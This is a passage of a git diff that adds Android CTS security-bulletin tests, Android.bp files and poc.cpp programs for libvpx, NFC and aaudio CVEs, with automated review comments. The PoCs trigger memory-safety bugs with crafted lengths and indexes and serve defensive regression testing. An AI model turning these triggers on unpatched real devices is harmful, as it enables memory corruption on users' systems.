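Review bot: `main` never checks the result of `allocate_stream()` before writing `private->m_read_fn`, and `codec` from `opj_j2k_create_decompress()` is passed on unchecked as well. Because the Android.bp for this test builds with `-DCHECK_OVERFLOW` and a crash is presumably what the harness treats as a finding, a NULL dereference during setup would look the same as the bug under test. Add `if (!stream) return EXIT_FAILURE;` after the `allocate_stream()` call and `if (!codec) { opj_free(sContext.blob); return EXIT_FAILURE; }` after `opj_j2k_create_decompress()`. The early return on `!sContext.blob` also leaves the stream allocated. This hunk starts two lines up the page.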
@@ -0,0 +1,36 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+cc_test {
+ name: "CVE-2017-13194",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ compile_multilib: "64",
+ shared_libs: [
+ "liblog",
+ ],
+ include_dirs: [
+ "external/libvpx/libvpx",
+ "external/libvpx/libvpx/vpx_ports",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ "-DENABLE_SELECTIVE_OVERLOADING",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-13194/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2017-13194/poc.cpp
new file mode 100644
index 00000000000..f11cac935ed
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-13194/poc.cpp
@@ -0,0 +1,127 @@ +/** + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <dlfcn.h> +#include <stdlib.h> +#include <string.h> +#include <sys/time.h> +#include <sys/types.h> +#include <sys/wait.h> +#include "../includes/memutils.h" +#include "vpx/vp8cx.h" +#include "vpx/vpx_codec.h" +#include "vpx/vpx_encoder.h" + +#define ENCODE_WIDTH 11 +#define ENCODE_HEIGHT 10000 +#define LIBNAME "/system/apex/com.android.media.swcodec/lib64/libvpx.so" +#define LIBNAME_APEX "/apex/com.android.media.swcodec/lib64/libvpx.so" + +char enable_selective_overload = ENABLE_NONE; + +int main() { + enable_selective_overload = ENABLE_ALL; + void *libHandle = dlopen(LIBNAME, RTLD_NOW | RTLD_LOCAL); + if (!libHandle) { + libHandle = dlopen(LIBNAME_APEX, RTLD_NOW | RTLD_LOCAL); + if (!libHandle) { + return EXIT_FAILURE; + } + } + vpx_codec_err_t codec_return = VPX_CODEC_OK; + vpx_codec_enc_cfg_t mCodecConfiguration; + vpx_image_t raw_frame; + uint32_t framerate = (30 << 16); + vpx_codec_iface_t *(*func_ptr1)() = + (vpx_codec_iface_t * (*)()) dlsym(libHandle, "vpx_codec_vp8_cx"); + if (!func_ptr1) { + dlclose(libHandle); + return EXIT_FAILURE; + } + vpx_codec_iface_t *mCodecInterface = (*func_ptr1)(); + if (!mCodecInterface) { + dlclose(libHandle); + return EXIT_FAILURE; + } + vpx_codec_err_t (*func_ptr2)(vpx_codec_iface_t *, vpx_codec_enc_cfg_t *, unsigned int) = + (vpx_codec_err_t(*)(vpx_codec_iface_t *, 
vpx_codec_enc_cfg_t *, unsigned int))dlsym( + libHandle, "vpx_codec_enc_config_default"); + if (!func_ptr2) { + dlclose(libHandle); + return EXIT_FAILURE; + } + codec_return = (*func_ptr2)(mCodecInterface, &mCodecConfiguration, 0); + mCodecConfiguration.g_w = ENCODE_WIDTH; + mCodecConfiguration.g_h = ENCODE_HEIGHT; + vpx_codec_ctx_t mCodecContext; + vpx_codec_err_t (*func_ptr3)(vpx_codec_ctx_t *, vpx_codec_iface_t *, vpx_codec_enc_cfg_t *, + vpx_codec_flags_t, int) = + (vpx_codec_err_t(*)(vpx_codec_ctx_t *, vpx_codec_iface_t *, vpx_codec_enc_cfg_t *, + vpx_codec_flags_t, int))dlsym(libHandle, "vpx_codec_enc_init_ver"); + if (!func_ptr3) { + dlclose(libHandle); + return EXIT_FAILURE; + } + codec_return = (*func_ptr3)(&mCodecContext, mCodecInterface, &mCodecConfiguration, 0, + VPX_ENCODER_ABI_VERSION); + + if (codec_return != VPX_CODEC_OK) { + return EXIT_FAILURE; + } + unsigned char *source = (unsigned char *)memalign(16, (ENCODE_WIDTH * ENCODE_HEIGHT * 3 / 2)); + if (!source) { + return EXIT_FAILURE; + } + memset(source, 0, (ENCODE_WIDTH * ENCODE_HEIGHT * 3 / 2)); + vpx_image_t (*func_ptr4)(vpx_image_t *, vpx_img_fmt_t, unsigned int, unsigned int, unsigned int, + unsigned char *) = + (vpx_image(*)(vpx_image *, vpx_img_fmt, unsigned int, unsigned int, unsigned int, + unsigned char *))dlsym(libHandle, "vpx_img_wrap"); + if (!func_ptr4) { + dlclose(libHandle); + free(source); + return EXIT_FAILURE; + } + (*func_ptr4)(&raw_frame, VPX_IMG_FMT_I420, ENCODE_WIDTH, ENCODE_HEIGHT, 1, source); + vpx_codec_err_t (*func_ptr5)(vpx_codec_ctx_t *, const vpx_image_t *, vpx_codec_pts_t, + unsigned long, vpx_enc_frame_flags_t, unsigned long) = + (vpx_codec_err_t(*)(vpx_codec_ctx *, const vpx_image *, long, unsigned long, long, + unsigned long))dlsym(libHandle, "vpx_codec_encode"); + if (!func_ptr5) { + dlclose(libHandle); + free(source); + return EXIT_FAILURE; + } + codec_return = + (*func_ptr5)(&mCodecContext, &raw_frame, framerate, + (uint32_t)(((uint64_t)1000000 << 16) / 
framerate), 0, VPX_DL_REALTIME); + if (codec_return != VPX_CODEC_OK) { + free(source); + return EXIT_FAILURE; + } + vpx_codec_err_t (*func_ptr6)(vpx_codec_ctx_t *) = + (vpx_codec_err_t(*)(vpx_codec_ctx *))dlsym(libHandle, "vpx_codec_destroy"); + if (!func_ptr6) { + dlclose(libHandle); + free(source); + return EXIT_FAILURE; + } + (*func_ptr6)(&mCodecContext); + enable_selective_overload = ENABLE_NONE; + dlclose(libHandle); + free(source); + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9558/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9558/Android.bp new file mode 100644 index 00000000000..ac45cc9edfe --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9558/Android.bp @@ -0,0 +1,34 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ + +cc_test { + name: "CVE-2018-9558", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ], + compile_multilib: "64", + shared_libs: [ + "libnfc-nci", + ], + include_dirs: [ + "system/nfc/src/nfc/include", + "system/nfc/src/gki/common", + "system/nfc/src/gki/ulinux", + "system/nfc/src/include", + ], +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9558/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9558/poc.cpp new file mode 100644 index 00000000000..e20c0f222d0 --- /dev/null 
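Review bot: The result of `vpx_codec_enc_config_default` (called through `func_ptr2`) is stored in `codec_return` but never tested, so on failure `mCodecConfiguration` reaches `vpx_codec_enc_init_ver` with only `g_w` and `g_h` set. Add `if (codec_return != VPX_CODEC_OK) { dlclose(libHandle); return EXIT_FAILURE; }` straight after that call. The later failure paths are inconsistent about cleanup: the returns after `func_ptr3` and after the `memalign` check skip `dlclose(libHandle)`, and the return after `func_ptr5` frees `source` but neither destroys the codec context nor closes the library. This hunk starts two lines up the page.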
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9558/poc.cpp @@ -0,0 +1,50 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include "../includes/common.h" +#include <stdlib.h> + +#include <nfc_api.h> +#include <rw_int.h> + +#define INITIAL_VALUE 0xBE +#define NUM_BYTES 1 + +extern tRW_CB rw_cb; +void rw_init(void); +void rw_t2t_handle_rsp(uint8_t *p_data); + +void poc_cback(tRW_EVENT event, tRW_DATA *p_rw_data) { + (void)event; + (void)p_rw_data; +} + +int main() { + tRW_T2T_CB *p_t2t = &rw_cb.tcb.t2t; + rw_init(); + rw_cb.p_cback = &poc_cback; + p_t2t->state = RW_T2T_STATE_DETECT_TLV; + p_t2t->tlv_detect = TAG_LOCK_CTRL_TLV; + p_t2t->substate = RW_T2T_SUBSTATE_WAIT_READ_TLV_VALUE; + p_t2t->found_tlv = TAG_LOCK_CTRL_TLV; + p_t2t->bytes_count = NUM_BYTES; + p_t2t->tlv_value[1] = UINT8_MAX; + uint8_t *base_ptr = (uint8_t *)(p_t2t->lockbyte + RW_T1T_MAX_LOCK_BYTES); + memset((void *)base_ptr, INITIAL_VALUE, sizeof(tRW_T1T_LOCK)); + uint8_t data[T2T_READ_DATA_LEN]; + rw_t2t_handle_rsp(data); + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9561/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9561/Android.bp new file mode 100644 index 00000000000..86b23dc67f5 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9561/Android.bp 
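Review bot: `uint8_t data[T2T_READ_DATA_LEN];` is handed to `rw_t2t_handle_rsp` without being initialised, so what the handler parses depends on whatever was on the stack. If the test does not rely on those contents, `uint8_t data[T2T_READ_DATA_LEN] = {};` makes the run repeatable. `memset` is used but the file includes only `<stdlib.h>` and the project headers, so `#include <string.h>` should be added rather than relying on a transitive include. It would also help to comment why the bytes after `p_t2t->lockbyte + RW_T1T_MAX_LOCK_BYTES` are filled with `INITIAL_VALUE`, since nothing reads them back in this file.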
@@ -0,0 +1,37 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2018-9561",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ ],
+ compile_multilib: "64",
+ include_dirs: [
+ "system/nfc/src/nfc/include/",
+ "system/nfc/src/include/",
+ "system/nfc/src/gki/ulinux/",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9561/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9561/poc.cpp
new file mode 100644
index 00000000000..6c4ccf2bc1c
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9561/poc.cpp
@@ -0,0 +1,41 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <stdlib.h>
+#include <string.h>
+#include "llcp_api.h"
+
+#define DEFAULT_VALUE 0x06
+#define SIZE 16
+#define LENGTH 1
+
+extern tLLCP_STATUS llcp_util_parse_connect(uint8_t* p_bytes, uint16_t length,
+ tLLCP_CONNECTION_PARAMS* p_params);
+
+int main() {
+ const int32_t offset = SIZE - LENGTH;
+ uint8_t* p_bytes = (uint8_t *)malloc(SIZE);
+ if (!p_bytes) {
+ return EXIT_FAILURE;
+ }
+ memset(p_bytes, DEFAULT_VALUE, SIZE);
+
+ tLLCP_CONNECTION_PARAMS params;
+ llcp_util_parse_connect(&p_bytes[offset], LENGTH, ¶ms);
+
+ free(p_bytes);
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9563/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9563/Android.bp
new file mode 100644
index 00000000000..f6254384846
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9563/Android.bp
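Review bot: Nothing in `main()` says why the parser is given `&p_bytes[offset]` with `offset = SIZE - LENGTH`, and that is the one fact a maintainer needs in order to see what this test checks. A comment above the call such as `// Parsing starts at the last byte of the allocation, so a read beyond the declared length leaves the buffer and trips the CHECK_OVERFLOW allocator.` would record it; the detection path is inferred from the `-DCHECK_OVERFLOW` flag and the memutils source in the matching Android.bp. The return value of `llcp_util_parse_connect` is also dropped silently, and a `(void)` cast would show that is deliberate. Both remarks apply equally to the CVE-2018-9563 poc.cpp hunk, which has the same layout around `llcp_util_parse_cc`.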
@@ -0,0 +1,37 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2018-9563",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ ],
+ compile_multilib: "64",
+ include_dirs: [
+ "system/nfc/src/nfc/include/",
+ "system/nfc/src/include/",
+ "system/nfc/src/gki/ulinux/",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9563/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9563/poc.cpp
new file mode 100644
index 00000000000..e0211145680
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9563/poc.cpp
@@ -0,0 +1,41 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <stdlib.h>
+#include <string.h>
+#include <llcp_api.h>
+
+#define DEFAULT_VALUE 0x02
+#define SIZE 16
+#define LENGTH 1
+
+extern tLLCP_STATUS llcp_util_parse_cc(uint8_t* p_bytes, uint16_t length,
+ uint16_t* p_miu, uint8_t* p_rw);
+
+int main() {
+ const int32_t offset = SIZE - LENGTH;
+ uint8_t* p_bytes = (uint8_t *)malloc(SIZE);
+ if (!p_bytes) {
+ return EXIT_FAILURE;
+ }
+ memset(p_bytes, DEFAULT_VALUE, SIZE);
+
+ tLLCP_CONNECTION_PARAMS params;
+ llcp_util_parse_cc(&p_bytes[offset], LENGTH, &(params.miu), &(params.rw));
+
+ free(p_bytes);
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9584/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9584/Android.bp
new file mode 100644
index 00000000000..0813445fe70
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9584/Android.bp
@@ -0,0 +1,40 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2018-9584",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ "-DENABLE_SELECTIVE_OVERLOADING",
+ ],
+ compile_multilib: "64",
+ include_dirs: [
+ "system/nfc/src/nfc/include/",
+ "system/nfc/src/include/",
+ "system/nfc/src/gki/common/",
+ "system/nfc/src/gki/ulinux/",
+ "system/nfc/src/nfa/include/",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9584/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9584/poc.cpp
new file mode 100644
index 00000000000..94aa6429c4a
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9584/poc.cpp
@@ -0,0 +1,49 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include "../includes/common.h"
+#include "../includes/memutils.h"
+#include <nfc_int.h>
+
+#define LENGTH 16
+
+char enable_selective_overload = ENABLE_NONE;
+extern tNFC_CB nfc_cb;
+
+static void resp_cback(tNFC_RESPONSE_EVT event, tNFC_RESPONSE *p_data) {
+ (void) event;
+ (void) p_data;
+}
+
+int main() {
+ nfc_cb.p_resp_cback = resp_cback;
+
+ enable_selective_overload = ENABLE_ALL;
+ uint8_t *p_msg = (uint8_t *)malloc(LENGTH);
+ if (!p_msg) {
+ return EXIT_FAILURE;
+ }
+
+ // Set evt_data.set_config.status
+ *p_msg = 0x03;
+ // Set evt_data.set_config.num_param_id
+ *(p_msg + 1) = 255;
+ nfc_ncif_set_config_status(p_msg, LENGTH);
+
+ free(p_msg);
+ enable_selective_overload = ENABLE_NONE;
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9585/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9585/Android.bp
new file mode 100644
index 00000000000..8bbdd4fbed6
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9585/Android.bp
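Review bot: Only the first two bytes of `p_msg` are written before `nfc_ncif_set_config_status(p_msg, LENGTH)` runs, so the other fourteen bytes of the message are whatever the allocator returned. The sibling CVE-2018-9585 poc.cpp fills its buffer before patching individual bytes; doing the same here, for example `memset(p_msg, 0x01, LENGTH);` right after the NULL check, keeps the input identical from run to run. The fill value is the author's call, since the bytes after the count are presumably read as parameter ids.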
@@ -0,0 +1,40 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2018-9585",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ "-DENABLE_SELECTIVE_OVERLOADING",
+ ],
+ compile_multilib: "64",
+ include_dirs: [
+ "system/nfc/src/nfc/include/",
+ "system/nfc/src/include/",
+ "system/nfc/src/gki/common/",
+ "system/nfc/src/gki/ulinux/",
+ "system/nfc/src/nfa/include/",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9585/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9585/poc.cpp
new file mode 100644
index 00000000000..7227adff091
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9585/poc.cpp
@@ -0,0 +1,48 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include "../includes/common.h"
+#include "../includes/memutils.h"
+#include <nfc_int.h>
+
+#define LENGTH 16
+
+char enable_selective_overload = ENABLE_NONE;
+extern tNFC_CB nfc_cb;
+
+static void resp_cback(tNFC_RESPONSE_EVT event, tNFC_RESPONSE* p_data) {
+ (void) event;
+ (void) p_data;
+}
+
+int main() {
+ nfc_cb.p_resp_cback = resp_cback;
+
+ enable_selective_overload = ENABLE_ALL;
+ uint8_t *p_msg = (uint8_t *)malloc(LENGTH);
+ if (!p_msg) {
+ return EXIT_FAILURE;
+ }
+ memset(p_msg, 0x01, LENGTH);
+
+ // Set evt_data.tlv_size
+ *(p_msg + 5) = 200;
+ nfc_ncif_proc_get_routing(p_msg, LENGTH);
+
+ free(p_msg);
+ enable_selective_overload = ENABLE_NONE;
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2007/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2007/Android.bp
new file mode 100644
index 00000000000..83150843142
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2007/Android.bp
@@ -0,0 +1,29 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+cc_test {
+ name: "CVE-2019-2007",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ],
+ shared_libs: [
+ "libaaudio_internal",
+ ],
+ include_dirs: [
+ "frameworks/av/media/libaaudio/src",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2007/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2007/poc.cpp
new file mode 100644
index 00000000000..7f8ebdb0b0f
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2007/poc.cpp
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include "../includes/common.h"
+#include "fifo/FifoBuffer.h"
+#include "fifo/FifoController.h"
+#include <stdlib.h>
+
+#define CAPACITY 83
+#define THRESHOLD 47
+#define NUM_FRAMES -9999999999
+
+using android::FifoController;
+
+int main() {
+ FifoController fifoController(CAPACITY, THRESHOLD);
+ fifoController.advanceReadIndex((android::fifo_frames_t)NUM_FRAMES);
+ fifoController.advanceWriteIndex((android::fifo_frames_t)NUM_FRAMES);
+ int32_t readIndex = fifoController.getReadIndex();
+ int32_t writeIndex = fifoController.getWriteIndex();
+
+ if ((readIndex < 0) || (writeIndex < 0)) {
+ return EXIT_VULNERABLE;
+ }
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2013/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2013/Android.bp
new file mode 100644
index 00000000000..7ffdd65281e
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2013/Android.bp
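Review bot: `NUM_FRAMES` is defined as `-9999999999`, which does not fit in 32 bits, so the two `(android::fifo_frames_t)` casts silently truncate it if `fifo_frames_t` is a 32-bit type, as the `int32_t` locals receiving the indexes suggest. The value the controller actually receives is therefore not the one written in the macro, and the macro body is also unparenthesised. If the out-of-range literal is intentional, say so where it is defined, e.g. `#define NUM_FRAMES (-9999999999LL)  // out of range on purpose; truncated by the fifo_frames_t cast`; otherwise replace it with the in-range negative count the test means to pass.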
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2019-2013",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ compile_multilib: "64",
+ include_dirs: [
+ "system/nfc/src/nfc/include/",
+ "system/nfc/src/include/",
+ "system/nfc/src/gki/common/",
+ "system/nfc/src/gki/ulinux/",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ "-DENABLE_SELECTIVE_OVERLOADING",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2013/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2013/poc.cpp
new file mode 100644
index 00000000000..23098acdf43
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2013/poc.cpp
@@ -0,0 +1,168 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <nfc_int.h> +#include <rw_int.h> +#include <dlfcn.h> + +#include "../includes/common.h" +#include "../includes/memutils.h" + +#define T3T_MSG_FELICALITE_MC_OFFSET 0x01 + +char enable_selective_overload = ENABLE_NONE; + +extern tRW_CB rw_cb; +extern tNFC_CB nfc_cb; +void rw_init(void); +tNFC_STATUS rw_t3t_select(uint8_t peer_nfcid2[NCI_RF_F_UID_LEN], + uint8_t mrti_check, uint8_t mrti_update); + +static void (*real_GKI_freebuf)(void* ptr) = nullptr; +void 